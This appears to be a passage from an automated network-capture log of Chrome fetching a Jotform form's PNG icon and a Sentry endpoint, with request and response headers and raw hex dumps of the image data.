                                                                                                                                                                                                                                            2025-01-10 12:36:00 UTC628INData Raw: 73 3a 5c 2f 5c 2f 65 75 2e 6a 6f 74 66 6f 72 6d 2e 63 6f 6d 5c 2f 75 70 6c 6f 61 64 73 5c 2f 47 69 74 74 65 6e 73 5f 4d 75 72 72 61 79 5c 2f 66 6f 72 6d 5f 66 69 6c 65 73 5c 2f 32 35 30 30 39 32 37 30 34 35 32 31 33 34 37 5f 6d 61 69 6e 50 57 41 49 63 6f 6e 2e 36 37 38 31 30 30 65 31 65 34 33 31 63 2e 70 6e 67 3f 77 69 64 74 68 3d 31 39 32 26 68 65 69 67 68 74 3d 31 39 32 26 74 69 6d 65 3d 31 37 33 36 35 30 37 37 31 37 22 2c 22 73 69 7a 65 73 22 3a 22 31 39 32 78 31 39 32 22 2c 22 74 79 70 65 22 3a 22 69 6d 61 67 65 5c 2f 70 6e 67 22 7d 2c 7b 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 65 75 2e 6a 6f 74 66 6f 72 6d 2e 63 6f 6d 5c 2f 75 70 6c 6f 61 64 73 5c 2f 47 69 74 74 65 6e 73 5f 4d 75 72 72 61 79 5c 2f 66 6f 72 6d 5f 66 69 6c 65 73 5c 2f 32 35
                                                                                                                                                                                                                                            Data Ascii: s:\/\/eu.jotform.com\/uploads\/Gittens_Murray\/form_files\/250092704521347_mainPWAIcon.678100e1e431c.png?width=192&height=192&time=1736507717","sizes":"192x192","type":"image\/png"},{"src":"https:\/\/eu.jotform.com\/uploads\/Gittens_Murray\/form_files\/25
                                                                                                                                                                                                                                            2025-01-10 12:36:00 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            31192.168.2.174973534.107.251.1254435732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2025-01-10 12:36:00 UTC853OUTGET /jufs/Gittens_Murray/form_files/250092704521347_mainPWAIcon.678100e1e431c.png?md5=ryw-nPNnemSleOEGRmSPqA&expires=1736510726 HTTP/1.1
                                                                                                                                                                                                                                            Host: eu-files.jotform.com
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                            Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                            Sec-Fetch-Dest: image
                                                                                                                                                                                                                                            Referer: https://eu.jotform.com/
                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                            Cookie: guest=guest_5a3c5173c0bb4f63; JOTFORM_SESSION=62953b85-a26b-4264-9cab-272a8b54; userReferer=https%3A%2F%2Feu.jotform.com%2Fapp%2F250092704521347
                                                                                                                                                                                                                                            2025-01-10 12:36:00 UTC504INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            access-control-allow-headers: Content-Type, Content-Length, Accept-Encoding, X-CSRF-Token, Authorization, accept, origin, Cache-Control, X-Requested-With, newrelic, traceparent, tracestate
                                                                                                                                                                                                                                            access-control-allow-methods: OPTIONS, GET
                                                                                                                                                                                                                                            access-control-allow-origin: *
                                                                                                                                                                                                                                            cache-control: public,max-age=7200
                                                                                                                                                                                                                                            content-type: image/png
                                                                                                                                                                                                                                            date: Fri, 10 Jan 2025 12:36:00 GMT
                                                                                                                                                                                                                                            via: 1.1 google
                                                                                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                            2025-01-10 12:36:00 UTC886INData Raw: 33 34 64 66 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 00 00 00 02 00 08 06 00 00 00 f4 78 d4 fa 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 20 00 49 44 41 54 78 5e ec bd 07 77 54 57 b6 fd bb 41 39 90 24 10 49 22 e7 60 a2 13 e0 dc b9 ef ff dd f7 be e7 7b 37 f6 ed 6e b7 db 36 b6 31 36 b6 49 26 e7 20 72 94 10 ca 12 bc f1 9b a7 b6 28 15 55 aa 53 92 c0 7d fb cc ea a1 81 1b 4a 55 67 cf bd f6 5a 73 c5 3d e3 ca 95 e7 cf 83 5f 46 c0 08 18 01 23 60 04 8c 40 a6 10 98 61 02 90 a9 fd f6 62 8d 80 11 30 02 46 c0 08 08 01 13 00 0b 82 11 30 02 46 c0 08 18 81 0c 22 60 02 90 c1 4d f7 92 8d 80 11 30 02 46 c0 08 98 00 58 06 8c 80 11 30 02 46 c0 08 64 10 01 13 80 0c 6e ba 97 6c 04 8c 80 11 30 02 46 c0 04 c0 32 60 04 8c 80 11 30 02 46 20 83 08 98 00 64 70
                                                                                                                                                                                                                                            Data Ascii: 34dfPNGIHDRxsRGB IDATx^wTWA9$I"`{7n616I& r(US}JUgZs=_F#`@ab0F0F"`M0FX0Fdnl0F2`0F dp
                                                                                                                                                                                                                                            2025-01-10 12:36:00 UTC1390INData Raw: 80 11 30 02 46 c0 08 18 81 0c 22 60 02 90 c1 4d f7 92 8d 80 11 30 02 46 c0 08 98 00 58 06 8c 80 11 30 02 46 c0 08 64 10 01 13 80 0c 6e ba 97 6c 04 8c 80 11 30 02 46 c0 04 c0 32 60 04 8c 80 11 30 02 46 20 83 08 98 00 64 70 d3 bd 64 23 60 04 8c 80 11 30 02 26 00 96 01 23 60 04 8c 80 11 30 02 19 44 c0 04 20 83 9b ee 25 1b 01 23 60 04 8c 80 11 30 01 b0 0c 18 01 23 60 04 8c 80 11 c8 20 02 26 00 19 dc 74 2f d9 08 18 01 23 60 04 8c 80 09 80 65 c0 08 18 01 23 60 04 8c 40 06 11 30 01 c8 e0 a6 7b c9 46 c0 08 18 01 23 60 04 4c 00 2c 03 46 c0 08 18 01 23 60 04 32 88 80 09 40 06 37 dd 4b 36 02 46 c0 08 18 01 23 60 02 60 19 30 02 46 c0 08 18 01 23 90 41 04 4c 00 32 b8 e9 5e b2 11 30 02 46 c0 08 18 01 13 00 cb 80 11 30 02 46 c0 08 18 81 0c 22 60 02 90 c1 4d f7 92 8d 80
                                                                                                                                                                                                                                            Data Ascii: 0F"`M0FX0Fdnl0F2`0F dpd#`0&#`0D %#`0#` &t/#`e#`@0{F#`L,F#`2@7K6F#``0F#AL2^0F0F"`M
                                                                                                                                                                                                                                            2025-01-10 12:36:00 UTC1390INData Raw: 41 04 4c 00 32 b8 e9 5e b2 11 30 02 46 c0 08 18 01 13 00 cb 80 11 30 02 46 c0 08 18 81 0c 22 60 02 90 c1 4d f7 92 8d 80 11 30 02 46 c0 08 98 00 58 06 8c 80 11 30 02 46 c0 08 64 10 01 13 80 0c 6e ba 97 6c 04 8c 80 11 30 02 46 c0 04 c0 32 60 04 8c 80 11 30 02 46 20 83 08 98 00 64 70 d3 bd 64 23 60 04 8c 80 11 30 02 26 00 96 01 23 60 04 8c 80 11 30 02 19 44 c0 04 20 83 9b ee 25 1b 01 23 60 04 8c 80 11 30 01 b0 0c 18 01 23 60 04 8c 80 11 c8 20 02 26 00 19 dc 74 2f d9 08 18 01 23 60 04 8c 80 09 80 65 c0 08 18 01 23 60 04 8c 40 06 11 30 01 c8 e0 a6 7b c9 46 c0 08 18 01 23 60 04 4c 00 2c 03 46 c0 08 18 01 23 60 04 32 88 80 09 40 06 37 dd 4b 36 02 46 c0 08 18 01 23 60 02 60 19 30 02 46 c0 08 18 01 23 90 41 04 4c 00 32 b8 e9 5e b2 11 30 02 46 c0 08 18 01 13 00 cb
                                                                                                                                                                                                                                            Data Ascii: AL2^0F0F"`M0FX0Fdnl0F2`0F dpd#`0&#`0D %#`0#` &t/#`e#`@0{F#`L,F#`2@7K6F#``0F#AL2^0F
                                                                                                                                                                                                                                            2025-01-10 12:36:00 UTC1390INData Raw: 5c d4 d6 84 fa ba 7a c9 6e c4 2a 1f a7 4a be 33 ae 05 d9 d3 39 c9 c9 1f eb e1 bc 54 f3 e7 cc 2a 11 80 67 cf 46 c3 e8 e8 b3 f0 6c 74 54 df 3b c2 39 19 1d 11 46 23 c3 b9 3f 8b e0 35 9d fb 13 95 16 38 70 9e c0 9e 67 e6 f9 a3 b2 7e f6 ec b9 ce f1 f0 c8 48 18 1a 1c 9c d6 7d 28 b6 16 94 73 94 c9 78 66 93 e7 4c de 9d c8 d3 50 18 e8 ef 97 2c 4f a4 54 59 47 3c fb 51 0f 8c c9 55 ee 2c 08 ef 1c ce d3 81 6d dc fb 88 25 32 31 76 0e 86 92 73 c0 f9 2b 74 58 e2 77 f3 fe 42 bd c5 67 ce 98 99 42 61 e4 ce bb 74 6e fc 91 9c 8d 86 d1 91 e4 cf 4a e4 39 df c0 f1 5c c2 b3 a6 5a e7 45 7b 53 f5 82 38 4f 84 dd 33 48 2d b2 2e bb 30 1a 9e 8d 3e d3 b3 44 9d c4 7f bf 8e 57 c4 b6 be a1 21 27 e7 c9 f3 73 de fa fb fb 25 db 3c 53 a5 af 31 bb 88 ad a9 a9 d6 59 87 e0 47 3d 12 75 6e be de ad
                                                                                                                                                                                                                                            Data Ascii: \zn*J39T*gFltT;9F#?58pg~H}(sxfLP,OTYG<QU,m%21vs+tXwBgBatnJ9\ZE{S8O3H-.0>DW!'s%<S1YG=un
                                                                                                                                                                                                                                            2025-01-10 12:36:00 UTC1390INData Raw: 22 57 a4 a5 d1 8f 57 2e 5f 09 b7 6e de d4 f3 54 f2 dd e8 71 f6 6c 41 5b 5b 58 b0 60 be e4 8d fd 23 ea d1 f3 e4 89 ce 0d 7b fe e8 d1 a3 29 93 e7 18 f6 47 67 22 cb cb 57 ac 08 4b 96 2e 11 d9 24 92 f8 f8 71 97 d6 70 e5 ca 15 7d 5f 3e d9 48 95 02 c8 f7 c8 1a 1a 1b a4 bc 30 ec 18 86 b9 fa 99 27 4f 71 ee 9c 39 5a 34 a1 8e da ba 84 65 cf 9a 3d 4b de 0d 71 67 8c 5e 54 1c 32 f0 78 31 a3 09 23 ea ea ee 0e 8f 1f 3d d2 03 3e 02 98 c7 8f 42 d7 e3 2e 19 0a de 5b 8a d1 63 40 97 b6 2f 0d db b7 6f 0f 9b 36 6f 0e 8b 17 2f d6 de de bb 77 2f 9c 3b 7b 36 1c 3e 7c 44 8a 01 e3 82 52 03 14 8c 1a bf b3 64 e9 52 bd 9f c3 99 9f ef ad 44 80 2a 79 2f 11 0f 88 4f 3c e8 91 00 f0 5c 28 38 b0 c5 e3 7c d5 2f be 17 23 76 fb f6 6d 09 c6 cd 1b 37 65 8c a3 c2 43 90 96 b6 b7 87 5d bb 76 86 f5
                                                                                                                                                                                                                                            Data Ascii: "WW._nTqlA[[X`#{)Gg"WK.$qp}_>H0'Oq9Z4e=Kqg^T2x1#=>B.[c@/o6o/w/;{6>|DRdRD*y/O<\(8|/#vm7eC]v
                                                                                                                                                                                                                                            2025-01-10 12:36:00 UTC1390INData Raw: 1c 8b 75 eb d7 87 7d ef ed 53 d4 13 c7 96 94 09 3a e5 f0 4f 3f 89 04 5c bb 76 4d fa 25 2d 01 89 04 00 6c 3a 96 2f 0b eb d6 af 0b 6f bc f1 86 f4 0b 8e f0 fd fb f7 a4 4f 7e fa f1 47 c9 2b 6b 9d ec 9a d8 07 1c 72 ec f1 ea d5 ab c2 d6 ad 5b c3 f2 95 2b a5 43 ef df bb 27 72 8e ae 3c 79 e2 c4 d8 19 8d fb 31 21 01 88 0c 3b e6 2e 31 fe 78 86 08 df f2 e5 cb c5 c4 51 d2 62 e3 55 33 55 35 a9 62 0e 2a ef d9 f8 f0 5c f6 29 be a2 1c 28 74 97 3b bc fc a9 2a e3 99 33 25 a0 8f 1f 3d 0e 17 2e 5e 0c 17 ce 5f 08 17 ce 9f d7 0f 86 a9 54 8e 0a a0 37 6c dc 18 7e fb bb df 86 f7 3f f8 20 ac 59 bb 46 5f 87 51 38 78 e0 60 f8 d3 9f fe 24 23 43 c8 0b a0 d8 6c 84 95 8d e6 47 21 c5 96 89 09 c0 8c 5c 45 78 f4 ea 30 42 90 1c 15 69 29 87 95 1c 2a c8 0d 84 a6 d4 8b 03 4f b8 8d 35 ea 70 8d
                                                                                                                                                                                                                                            Data Ascii: u}S:O?\vM%-l:/oO~G+kr[+C'r<y1!;.1xQbU3U5b*\)(t;*3%=.^_T7l~? YF_Q8x`$#ClG!\Ex0Bi)*O5p
                                                                                                                                                                                                                                            2025-01-10 12:36:00 UTC1390INData Raw: 6b e4 99 f1 ae e3 f3 f2 27 de 25 64 59 61 72 fd f4 24 e7 3f d7 f5 14 9f 1b f2 18 8d 3e 7a 8c 94 d3 ac 59 b3 55 dc 8b 9c f1 e2 f7 f9 7e 0c 2d c6 0e 8f 11 fd 10 eb 5d 8a ed a7 6a 74 e6 cd 4b a2 33 9b 13 39 e1 b9 30 7a d2 8d 3d 3d e1 f1 c3 47 d2 2b d4 8b e4 1a bf c7 e0 8c b9 6b c8 88 0a 09 73 05 8e 7c 2e 91 0d d5 fa 3c 7c a8 50 39 cf c5 d9 c3 9b bd 73 e7 ae 22 01 91 ec 4f 66 7f a2 e1 84 44 41 2e 13 03 bd 57 b5 64 e8 62 74 08 51 87 e3 c7 8f 87 13 3f ff 2c 3c 2e 5f be a4 bc 7d 9a ba 90 48 30 b0 6b c8 2f 9f 8f 3e 21 f2 8c de c6 d9 b9 7a ed 5a f8 ea 8b 2f c3 b1 63 c7 a4 53 f2 53 c3 69 d6 14 49 53 24 b4 db 77 ec 08 1b 37 6d 94 83 ce 1a a8 a5 38 7a e4 48 38 79 f2 a4 1c a5 ab 57 ae c8 f9 2c 5b 03 10 0f 95 0a a2 66 cf 16 e3 46 99 6d dc bc 29 2c 5f b6 4c 46 10 41 62
                                                                                                                                                                                                                                            Data Ascii: k'%dYar$?>zYU~-]jtK390z==G+ks|.<|P9s"OfDA.WdbtQ?,<._}H0k/>!zZ/cSSiIS$w7m8zH8yW,[fFm),_LFAb
                                                                                                                                                                                                                                            2025-01-10 12:36:00 UTC1390INData Raw: 01 43 04 a9 c3 40 21 67 9c 7b f4 00 91 b4 43 df 1f 52 54 62 ac 48 b7 a7 27 15 01 c0 51 64 3f 90 51 7e 17 a3 8d 5c dc bd 7d 27 19 fc 96 f7 42 b7 26 ad d9 89 f7 4f 2a 16 62 b4 68 f1 a2 b0 74 c9 52 75 16 b0 46 de c3 9a 2e 5d b8 98 18 63 c8 f8 c9 53 3a 4f 93 25 bf e0 41 4d 0e 5e 33 64 9f 48 5d 7b 7b 87 a2 da 6a fd 25 c5 f5 f4 a9 e4 fb fa d5 6b 0a 9f 7f ff dd 77 f2 da b1 6d 69 e6 26 c4 94 20 44 8d 28 c3 ee 37 77 cb 8e 92 ca a1 18 78 60 70 20 9c 3a 79 52 6b 01 23 8a 58 89 e4 a6 59 13 98 c4 36 43 a2 16 d4 e9 ec 7d ef 3d 39 e8 9c cd 24 c5 70 21 7c f5 65 42 2e 39 1f f9 9d 56 63 d1 a1 c2 39 00 b1 57 1e 96 88 e7 0f f3 67 53 59 00 21 41 31 97 fb f7 e5 99 e3 c9 5c bf 7e 3d dc bd 73 37 3c 7e fc 48 21 07 0a f9 88 0a c4 4a d3 d8 c6 17 53 00 b1 bd 4b 83 7b 18 34 53 57 1b
                                                                                                                                                                                                                                            Data Ascii: C@!g{CRTbH'Qd?Q~\}'B&O*bhtRuF.]cS:O%AM^3dH]{{j%kwmi& D(7wx`p :yRk#XY6C}=9$p!|eB.9Vc9WgSY!A1\~=s7<~H!JSK{4SW
                                                                                                                                                                                                                                            2025-01-10 12:36:00 UTC1390INData Raw: cd e1 ad b7 df 52 95 24 61 49 86 46 90 8b a1 a8 40 3d dc 57 28 c8 48 0a c2 e2 d4 a6 b2 2d 29 79 f3 f8 a3 41 8e a1 92 28 b4 f9 0a b1 dc e6 56 4a 00 c6 42 1f 71 86 a8 0a ae d3 10 80 05 ea 18 d8 b6 7d 5b 20 d7 85 90 de bf ff 40 87 24 e6 86 61 5d 69 08 40 29 c5 1b 0f 44 a9 7f 87 00 50 c0 48 18 89 0d e7 4f 52 32 84 db be fe ea 6b 1d 54 c2 c2 0f 1e dc 4f 45 00 22 25 2f c4 b8 14 01 80 7d 7f f9 f9 17 e1 cf ff f3 67 45 1b a6 42 00 f2 e5 a4 70 bd a5 08 00 06 9f 90 79 d2 32 f3 4c 8a 5f 53 dc 66 ce d4 94 33 0c cf 8f 3f fe 14 8e 1d 3d 1a ae 5c ba 3c d6 b6 93 26 44 3e 1d 04 80 b0 2a 73 13 62 6e 99 6a 5c f6 54 75 0a 27 4f 86 d3 a7 cf 84 f3 e7 ce a9 da 9b 82 2d 75 00 94 68 1f 8d b2 10 cf 46 be 6c 88 44 e6 fd bc 0e 02 40 2d 06 9e 1a 0a 8a b3 0e 01 68 6b 5b 28 85 4d db 16
                                                                                                                                                                                                                                            Data Ascii: R$aIF@=W(H-)yA(VJBq}[ @$a]i@)DPHOR2kTOE"%/}gEBpy2L_Sf3?=\<&D>*sbnj\Tu'O-uhFlD@-hk[(M
                                                                                                                                                                                                                                            2025-01-10 12:36:00 UTC1390INData Raw: fa 97 f2 d0 c8 dc 2b 0a af 4e 65 f4 e7 ab 3c 4f 7c 76 29 02 40 51 29 91 1f bc 7b d6 a5 59 0d 6d 6d d2 19 cc e6 bf 7d e7 76 f8 ee c0 c1 70 ea d4 49 a5 a2 98 6c 47 84 b0 92 17 8a 92 19 23 ec 27 29 48 a2 5d 4c 51 a4 56 87 f0 f6 c1 6f 0f 2a 05 91 f4 c4 6f d2 40 32 f2 ab 74 0c 65 ad 0b 60 aa 04 20 d6 5f 51 4c 08 01 f8 fd 1f fe 10 de 7d f7 1d 75 5e 88 b8 9e 3b a7 d4 e2 df 3e fd 9b 48 f5 eb 20 00 f9 a9 0a 06 b6 ed d9 b7 2f ec db bb 57 c6 92 48 34 c6 99 28 1f 44 13 59 44 c6 48 4d a7 25 9a 38 0c 8c c9 45 b6 62 1a 15 6f 1a 1d f1 ed 81 03 49 c1 dc a3 47 0a cd 33 fe 7a ef 7b 7b 25 7f 33 67 56 a9 f5 96 28 0b 11 c6 38 f9 32 4d 37 c0 cb e4 b6 5d a9 00 be 1f 3b 0b 81 66 5e 0e 67 06 bd 45 dd 05 7f 42 a2 f3 d3 68 b1 f0 99 c8 d7 b2 15 cb 25 ff 7b f6 30 18 ab 43 69 0a 3a 08
                                                                                                                                                                                                                                            Data Ascii: +Ne<O|v)@Q){Ymm}vpIlG#')H]LQVo*o@2te` _QL}u^;>H /WH4(DYDHM%8EboIG3z{{%3gV(82M7];f^gEBh%{0Ci:


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            32192.168.2.174973634.120.195.2494435732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2025-01-10 12:36:00 UTC476OUTGET /api/5223511/envelope/?sentry_key=36d29a013f8a4bd7adfe310f5fe4d75a&sentry_version=7&sentry_client=sentry.javascript.react%2F8.34.0 HTTP/1.1
                                                                                                                                                                                                                                            Host: o61806.ingest.sentry.io
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                            2025-01-10 12:36:00 UTC290INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                            Date: Fri, 10 Jan 2025 12:36:00 GMT
                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                            Content-Length: 548
                                                                                                                                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                            Via: 1.1 google
                                                                                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            2025-01-10 12:36:00 UTC548INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20
                                                                                                                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            33192.168.2.1749737104.19.128.1054435732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2025-01-10 12:36:01 UTC862OUTGET /uploads/Gittens_Murray/form_files/250092704521347_mainPWAIcon.678100e1e431c.png?width=144&height=144&time=1736507717 HTTP/1.1
                                                                                                                                                                                                                                            Host: eu.jotform.com
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                            Sec-Fetch-Dest: image
                                                                                                                                                                                                                                            Referer: https://eu.jotform.com/app/250092704521347
                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                            Cookie: guest=guest_5a3c5173c0bb4f63; JOTFORM_SESSION=62953b85-a26b-4264-9cab-272a8b54; userReferer=https%3A%2F%2Feu.jotform.com%2Fapp%2F250092704521347
                                                                                                                                                                                                                                            2025-01-10 12:36:01 UTC1259INHTTP/1.1 302 Found
                                                                                                                                                                                                                                            Date: Fri, 10 Jan 2025 12:36:01 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            p3p: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
                                                                                                                                                                                                                                            last-modified: Fri, 10 Jan 2025 12:05:18 GMT
                                                                                                                                                                                                                                            jf-trace-id: 3b2e82d0c52937c5
                                                                                                                                                                                                                                            strict-transport-security: max-age=31536000;
                                                                                                                                                                                                                                            content-security-policy-report-only: default-src https: data: blob: wss: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' *.jotfor.ms https://js.jotform.com/actions.js https://www.googletagmanager.com https://consent.cookiebot.com https://consentcdn.cookiebot.com https://static.olark.com https://knrpc.olark.com/nrpc/ https://js-agent.newrelic.com https://browser.sentry-cdn.com https://js.sentry-cdn.com https://edge.fullstory.com https://rs.fullstory.com; report-uri /opt/csp-violation-report.php
                                                                                                                                                                                                                                            expires: Fri, 10 Jan 2025 13:36:01 GMT
                                                                                                                                                                                                                                            Cache-Control: public, max-age=3600
                                                                                                                                                                                                                                            pragma: no-cache
                                                                                                                                                                                                                                            access-control-allow-origin: *
                                                                                                                                                                                                                                            location: https://eu-files.jotform.com/jufs/Gittens_Murray/form_files/250092704521347_mainPWAIcon.678100e1e431c.png?md5=BVGW99P1wnPlh67eKiG1PA&expires=1736510728&width=144&height=144
                                                                                                                                                                                                                                            via: 1.1 google
                                                                                                                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                                                                                                                            Age: 1843
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 8ffcb5d4080b440e-EWR


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            34192.168.2.174973934.107.251.1254435732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2025-01-10 12:36:01 UTC620OUTGET /jufs/Gittens_Murray/form_files/250092704521347_mainPWAIcon.678100e1e431c.png?md5=ryw-nPNnemSleOEGRmSPqA&expires=1736510726 HTTP/1.1
                                                                                                                                                                                                                                            Host: eu-files.jotform.com
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                            Cookie: guest=guest_5a3c5173c0bb4f63; JOTFORM_SESSION=62953b85-a26b-4264-9cab-272a8b54; userReferer=https%3A%2F%2Feu.jotform.com%2Fapp%2F250092704521347
                                                                                                                                                                                                                                            2025-01-10 12:36:01 UTC504INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            access-control-allow-headers: Content-Type, Content-Length, Accept-Encoding, X-CSRF-Token, Authorization, accept, origin, Cache-Control, X-Requested-With, newrelic, traceparent, tracestate
                                                                                                                                                                                                                                            access-control-allow-methods: OPTIONS, GET
                                                                                                                                                                                                                                            access-control-allow-origin: *
                                                                                                                                                                                                                                            cache-control: public,max-age=7200
                                                                                                                                                                                                                                            content-type: image/png
                                                                                                                                                                                                                                            date: Fri, 10 Jan 2025 12:36:01 GMT
                                                                                                                                                                                                                                            via: 1.1 google
                                                                                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Transfer-Encoding: chunked
